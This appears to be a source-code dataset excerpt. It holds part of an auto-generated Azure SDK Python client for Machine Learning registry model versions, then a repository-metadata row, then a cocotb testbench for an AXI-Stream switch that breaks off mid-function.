"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"registryName": _SERIALIZER.url("registry_name", registry_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
if skiptoken is not None:
query_parameters['$skiptoken'] = _SERIALIZER.query("skiptoken", skiptoken, 'str')
if order_by is not None:
query_parameters['$orderBy'] = _SERIALIZER.query("order_by", order_by, 'str')
if top is not None:
query_parameters['$top'] = _SERIALIZER.query("top", top, 'int')
if version is not None:
query_parameters['version'] = _SERIALIZER.query("version", version, 'str')
if description is not None:
query_parameters['description'] = _SERIALIZER.query("description", description, 'str')
if tags is not None:
query_parameters['tags'] = _SERIALIZER.query("tags", tags, 'str')
if properties is not None:
query_parameters['properties'] = _SERIALIZER.query("properties", properties, 'str')
if list_view_type is not None:
query_parameters['listViewType'] = _SERIALIZER.query("list_view_type", list_view_type, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_delete_request(
name, # type: str
version, # type: str
subscription_id, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}')
path_format_arguments = {
"name": _SERIALIZER.url("name", name, 'str'),
"version": _SERIALIZER.url("version", version, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"registryName": _SERIALIZER.url("registry_name", registry_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_request(
name, # type: str
version, # type: str
subscription_id, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}')
path_format_arguments = {
"name": _SERIALIZER.url("name", name, 'str'),
"version": _SERIALIZER.url("version", version, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"registryName": _SERIALIZER.url("registry_name", registry_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_create_or_update_request_initial(
name, # type: str
version, # type: str
subscription_id, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}')
path_format_arguments = {
"name": _SERIALIZER.url("name", name, 'str', pattern=r'^(?![\-_.])[a-zA-Z0-9\-_.]{1,255}(?<!\.)$'),
"version": _SERIALIZER.url("version", version, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"registryName": _SERIALIZER.url("registry_name", registry_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_package_request_initial(
name, # type: str
version, # type: str
subscription_id, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}/package')
path_format_arguments = {
"name": _SERIALIZER.url("name", name, 'str', pattern=r'^[a-zA-Z0-9][a-zA-Z0-9\-_]{0,254}$'),
"version": _SERIALIZER.url("version", version, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"registryName": _SERIALIZER.url("registry_name", registry_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
# fmt: on
class ModelVersionsOperations(object):
"""ModelVersionsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.machinelearningservices.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
name, # type: str
resource_group_name, # type: str
registry_name, # type: str
skiptoken=None, # type: Optional[str]
order_by=None, # type: Optional[str]
top=None, # type: Optional[int]
version=None, # type: Optional[str]
description=None, # type: Optional[str]
tags=None, # type: Optional[str]
properties=None, # type: Optional[str]
list_view_type=None, # type: Optional[Union[str, "_models.ListViewType"]]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ModelVersionResourceArmPaginatedResult"]
"""List versions.
List versions.
:param name: Container name. This is case-sensitive.
:type name: str
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param registry_name: Name of Azure Machine Learning registry.
:type registry_name: str
:param skiptoken: Continuation token for pagination.
:type skiptoken: str
:param order_by: Ordering of list.
:type order_by: str
:param top: Maximum number of records to return.
:type top: int
:param version: Version identifier.
:type version: str
:param description: Model description.
:type description: str
:param tags: Comma-separated list of tag names (and optionally values). Example:
tag1,tag2=value2.
:type tags: str
:param properties: Comma-separated list of property names (and optionally values). Example:
prop1,prop2=value2.
:type properties: str
:param list_view_type: View type for including/excluding (for example) archived entities.
:type list_view_type: str or ~azure.mgmt.machinelearningservices.models.ListViewType
:keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note
that overriding this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ModelVersionResourceArmPaginatedResult or the
result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.machinelearningservices.models.ModelVersionResourceArmPaginatedResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
cls = kwargs.pop("cls", None) # type: ClsType["_models.ModelVersionResourceArmPaginatedResult"]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
name=name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
skiptoken=skiptoken,
order_by=order_by,
top=top,
version=version,
description=description,
tags=tags,
properties=properties,
list_view_type=list_view_type,
template_url=self.list.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
name=name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
skiptoken=skiptoken,
order_by=order_by,
top=top,
version=version,
description=description,
tags=tags,
properties=properties,
list_view_type=list_view_type,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ModelVersionResourceArmPaginatedResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions"} # type: ignore
@distributed_trace
def delete(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Delete version.
Delete version.
:param name: Container name.
:type name: str
:param version: Version identifier.
:type version: str
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param registry_name: Name of Azure Machine Learning registry.
:type registry_name: str
:keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note
that overriding this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
request = build_delete_request(
name=name,
version=version,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
template_url=self.delete.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore
@distributed_trace
def get(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ModelVersionData"
"""Get version.
Get version.
:param name: Container name. This is case-sensitive.
:type name: str
:param version: Version identifier. This is case-sensitive.
:type version: str
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param registry_name: Name of Azure Machine Learning registry.
:type registry_name: str
:keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note
that overriding this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ModelVersionData, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.ModelVersionData
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType["_models.ModelVersionData"]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
request = build_get_request(
name=name,
version=version,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
template_url=self.get.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("ModelVersionData", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore
def _create_or_update_initial(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
body, # type: "_models.ModelVersionData"
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = self._serialize.body(body, "ModelVersionData")
request = build_create_or_update_request_initial(
name=name,
version=version,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
response_headers = {}
response_headers["x-ms-async-operation-timeout"] = self._deserialize(
"duration", response.headers.get("x-ms-async-operation-timeout")
)
response_headers["Location"] = self._deserialize("str", response.headers.get("Location"))
response_headers["Retry-After"] = self._deserialize("int", response.headers.get("Retry-After"))
if cls:
return cls(pipeline_response, None, response_headers)
_create_or_update_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore
@distributed_trace
def begin_create_or_update(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
body, # type: "_models.ModelVersionData"
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Create or update version.
Create or update version.
:param name: Container name.
:type name: str
:param version: Version identifier.
:type version: str
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param registry_name: Name of Azure Machine Learning registry.
:type registry_name: str
:param body: Version entity to create or update.
:type body: ~azure.mgmt.machinelearningservices.models.ModelVersionData
:keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note
that overriding this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
name=name,
version=version,
resource_group_name=resource_group_name,
registry_name=registry_name,
body=body,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}"} # type: ignore
def _package_initial(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
body, # type: "_models.PackageRequest"
**kwargs # type: Any
):
# type: (...) -> Optional["_models.PackageResponse"]
cls = kwargs.pop("cls", None) # type: ClsType[Optional["_models.PackageResponse"]]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = self._serialize.body(body, "PackageRequest")
request = build_package_request_initial(
name=name,
version=version,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._package_initial.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
response_headers = {}
if response.status_code == 200:
deserialized = self._deserialize("PackageResponse", pipeline_response)
if response.status_code == 202:
response_headers["Location"] = self._deserialize("str", response.headers.get("Location"))
response_headers["Retry-After"] = self._deserialize("int", response.headers.get("Retry-After"))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_package_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}/package"} # type: ignore
@distributed_trace
def begin_package(
self,
name, # type: str
version, # type: str
resource_group_name, # type: str
registry_name, # type: str
body, # type: "_models.PackageRequest"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.PackageResponse"]
"""Model Version Package operation.
Model Version Package operation.
:param name: Container name. This is case-sensitive.
:type name: str
:param version: Version identifier. This is case-sensitive.
:type version: str
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param registry_name: Name of Azure Machine Learning registry.
:type registry_name: str
:param body: Package operation request body.
:type body: ~azure.mgmt.machinelearningservices.models.PackageRequest
:keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note
that overriding this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either PackageResponse or the result of
cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.machinelearningservices.models.PackageResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType["_models.PackageResponse"]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._package_initial(
name=name,
version=version,
resource_group_name=resource_group_name,
registry_name=registry_name,
body=body,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize("PackageResponse", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = ARMPolling(lro_delay, lro_options={"final-state-via": "location"}, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_package.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}/package"} # type: ignore
| [
"[email protected]"
] | |
5770ffe7fdec00cd3c57add6a4c9a57c867b7d78 | 21445827919e574e6150117f9520c5326251c654 | /lib/axis/tb/axis_switch/test_axis_switch.py | 7132a00db6c2daf5401d45cfbca3c819a102aaa4 | [
"MIT"
] | permissive | nyhuang/verilog-ethernet | 0af9b2333f673b1256a26868ce60e946d98be940 | cf832f581cfc43d6eb60af6ec68517f446ed9158 | refs/heads/master | 2023-06-26T04:13:22.530195 | 2021-06-28T08:34:34 | 2021-06-28T08:34:34 | 262,713,491 | 1 | 0 | MIT | 2020-05-10T04:43:45 | 2020-05-10T04:43:44 | null | UTF-8 | Python | false | false | 10,556 | py | #!/usr/bin/env python
"""
Copyright (c) 2021 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import itertools
import logging
import os
import random
import subprocess
import cocotb_test.simulator
import pytest
import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge, Event
from cocotb.regression import TestFactory
from cocotbext.axi import AxiStreamBus, AxiStreamFrame, AxiStreamSource, AxiStreamSink
class TB(object):
def __init__(self, dut):
self.dut = dut
s_count = len(dut.axis_switch_inst.s_axis_tvalid)
m_count = len(dut.axis_switch_inst.m_axis_tvalid)
self.log = logging.getLogger("cocotb.tb")
self.log.setLevel(logging.DEBUG)
cocotb.fork(Clock(dut.clk, 10, units="ns").start())
self.source = [AxiStreamSource(AxiStreamBus.from_prefix(dut, f"s{k:02d}_axis"), dut.clk, dut.rst) for k in range(s_count)]
self.sink = [AxiStreamSink(AxiStreamBus.from_prefix(dut, f"m{k:02d}_axis"), dut.clk, dut.rst) for k in range(m_count)]
def set_idle_generator(self, generator=None):
if generator:
for source in self.source:
source.set_pause_generator(generator())
def set_backpressure_generator(self, generator=None):
if generator:
for sink in self.sink:
sink.set_pause_generator(generator())
async def reset(self):
self.dut.rst.setimmediatevalue(0)
await RisingEdge(self.dut.clk)
await RisingEdge(self.dut.clk)
self.dut.rst <= 1
await RisingEdge(self.dut.clk)
await RisingEdge(self.dut.clk)
self.dut.rst <= 0
await RisingEdge(self.dut.clk)
await RisingEdge(self.dut.clk)
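# Note (added comment): reset() above lets the clock run for two edges with
# `rst` low, asserts `rst` for two edges, then deasserts it and waits two more,
# giving the DUT a clean synchronous reset pulse before each test.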
async def run_test(dut, payload_lengths=None, payload_data=None, idle_inserter=None, backpressure_inserter=None, s=0, m=0):
tb = TB(dut)
id_count = 2**len(tb.source[s].bus.tid)
cur_id = 1
await tb.reset()
tb.set_idle_generator(idle_inserter)
tb.set_backpressure_generator(backpressure_inserter)
test_frames = []
for test_data in [payload_data(x) for x in payload_lengths()]:
test_frame = AxiStreamFrame(test_data)
test_frame.tid = cur_id
test_frame.tdest = m
test_frames.append(test_frame)
await tb.source[s].send(test_frame)
cur_id = (cur_id + 1) % id_count
for test_frame in test_frames:
rx_frame = await tb.sink[m].recv()
assert rx_frame.tdata == test_frame.tdata
assert rx_frame.tid == test_frame.tid
assert rx_frame.tdest == test_frame.tdest
assert not rx_frame.tuser
assert all(s.empty() for s in tb.sink)
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
async def run_test_tuser_assert(dut, s=0, m=0):
tb = TB(dut)
await tb.reset()
test_data = bytearray(itertools.islice(itertools.cycle(range(256)), 32))
test_frame = AxiStreamFrame(test_data, tuser=1, tdest=m)
await tb.source[s].send(test_frame)
rx_frame = await tb.sink[m].recv()
assert rx_frame.tdata == test_data
assert rx_frame.tuser
assert all(s.empty() for s in tb.sink)
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
async def run_arb_test(dut):
tb = TB(dut)
byte_lanes = tb.source[0].byte_lanes
id_count = 2**len(tb.source[0].bus.tid)
cur_id = 1
await tb.reset()
test_frames = []
length = byte_lanes*16
test_data = bytearray(itertools.islice(itertools.cycle(range(256)), length))
for k in range(5):
test_frame = AxiStreamFrame(test_data, tx_complete=Event())
test_frame.tid = cur_id
test_frame.tdest = 0
src_ind = 0
if k == 0:
src_ind = 0
elif k == 4:
await test_frames[1].tx_complete.wait()
for j in range(8):
await RisingEdge(dut.clk)
src_ind = 0
else:
src_ind = 1
test_frames.append(test_frame)
await tb.source[src_ind].send(test_frame)
cur_id = (cur_id + 1) % id_count
for k in [0, 1, 2, 4, 3]:
test_frame = test_frames[k]
rx_frame = await tb.sink[0].recv()
assert rx_frame.tdata == test_frame.tdata
assert rx_frame.tid == test_frame.tid
assert rx_frame.tdest == test_frame.tdest
assert not rx_frame.tuser
assert all(s.empty() for s in tb.sink)
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
async def run_stress_test(dut, idle_inserter=None, backpressure_inserter=None):
tb = TB(dut)
byte_lanes = tb.source[0].byte_lanes
id_count = 2**len(tb.source[0].bus.tid)
cur_id = 1
await tb.reset()
tb.set_idle_generator(idle_inserter)
tb.set_backpressure_generator(backpressure_inserter)
test_frames = [[list() for y in tb.sink] for x in tb.source]
for p in range(len(tb.source)):
for k in range(128):
length = random.randint(1, byte_lanes*16)
test_data = bytearray(itertools.islice(itertools.cycle(range(256)), length))
test_frame = AxiStreamFrame(test_data)
test_frame.tid = cur_id
test_frame.tdest = random.randrange(len(tb.sink))
test_frames[p][test_frame.tdest].append(test_frame)
await tb.source[p].send(test_frame)
cur_id = (cur_id + 1) % id_count
for lst in test_frames:
while any(lst):
rx_frame = await tb.sink[[x for x in lst if x][0][0].tdest].recv()
test_frame = None
for lst_a in test_frames:
for lst_b in lst_a:
if lst_b and lst_b[0].tid == rx_frame.tid:
test_frame = lst_b.pop(0)
break
assert test_frame is not None
assert rx_frame.tdata == test_frame.tdata
assert rx_frame.tid == test_frame.tid
assert rx_frame.tdest == test_frame.tdest
assert not rx_frame.tuser
assert all(s.empty() for s in tb.sink)
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
def cycle_pause():
return itertools.cycle([1, 1, 1, 0])
def size_list():
data_width = len(cocotb.top.s00_axis_tdata)
byte_width = data_width // 8
return list(range(1, byte_width*4+1))+[512]+[1]*64
def incrementing_payload(length):
